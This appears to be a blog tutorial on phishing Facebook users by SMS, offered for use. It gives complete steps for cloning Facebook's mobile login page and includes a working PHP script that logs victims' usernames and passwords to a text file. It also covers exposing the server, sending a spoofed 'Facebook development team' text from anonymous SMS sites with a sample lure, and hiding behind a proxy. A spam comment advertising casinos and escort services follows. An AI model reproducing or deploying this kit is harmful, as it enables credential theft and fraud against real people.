SMS Phishing
SMS Phishing ??????
What happens?
Victim receives a sms on his mobile apparently from facebook asking to
try out new version of facebook. A link is provided in the sms. The
victim opens the link, sees the facebook login page. He makes the login
and it shows username/password is wrong. He gets phished...
To proceed ahead, you need to have a web server running on your computer connected to internet and mobile number of the victim.
Process:
SETTING UP YOUR PHISHING PAGE.
Go to http://m.facebook.com/
and copy the source code. Place it your web server's public html folder
with ".htm" as extension. Open this html file in notepad and go to the
form tag. In that, replace the form method from POST to GET. Change the
form action value to write.php (you can change the name if you want).
Rename the file as "index.htm". Create another file and name it as
"write.php". Open write.php and copy the following content to the same.
Save it.
Code:
<?php
header("Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6");
$handle = fopen("pswd.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Also create another file pswd.txt and leave it as it is. This is the file where our usernames and passwords are getting stored.
You can store these files in any directory under public html. Remember
to keep the name of directory something like facebook or similar.
Now start the server.
CHECKING IF OUR PHISHING PAGE IS WORKING.
go to cmyip.com to know your ip address. Paste this ip address in
address bar. You should see your phishing page or your default
index.htm(if the files are stored in any directory under public html).
If not, following maybe the reasons for it:
1. You maybe behind a router. So, you need to open router's settings and enable port forwarding to your machine.
2. Your server maybe configured not to allow any outside connections.
So, check out access settings and enable outside connections.
3. Your server may not be running properly.
Now, you need to navigate to the directory in which our phishing files
are stored. for example, my files are in /smsphish under public html.
So, i'll navigate to...
http://myipaddress/smsphish/
There you
can see the fake login of facebook. You can enter any fake stuff in
username and password field. Press enter. It should redirect you to the
actual facebook mobile site. Now, open our pswd.txt file and see if our
entered details are logged there. If they are, our work is mostly done.
if they are not, check that you have made necessary changes in index.htm
and the write.php is not tampered.
Now nearly 90% work is done. We move to the last step...
SENDING THE SMS.
Now you have to find free smsing sites which do not require to
register. These sites use their own number for sending messeages. You
can find many such sites. One word: Google. Now here comes our social
engineering techniques. Just type the message like "Experience the brand
new, more secure version of facebook, simply follow the link,.. blah
blah" and give link to our phishing page. A sample message would look
like this.
Quote
Experience the brand new version of facebook! Faster and secure. Follow the link now:
http://youripaddress/yourdirectory/
-Facebook development team.
You can think of many more luring techniques... just think!
Enter the victim's mobile number and send the message! (recommended use
proxy) If he opens the message and link, he will see the normal
facebook mobile login and if he enters the correct details, our phishing
worked! just keep watch on pswd.txt for their details!
Note: Be careful when running server!
Mr. Casino: Online Gaming | DrMCD
ReplyDeletePlay online 김천 출장샵 casino games and casino games 서산 출장안마 for real money with Mr.Cad. Mr. Casino - one of our top 서울특별 출장마사지 rated online 이천 출장안마 casinos 시흥 출장샵 and best bonuses.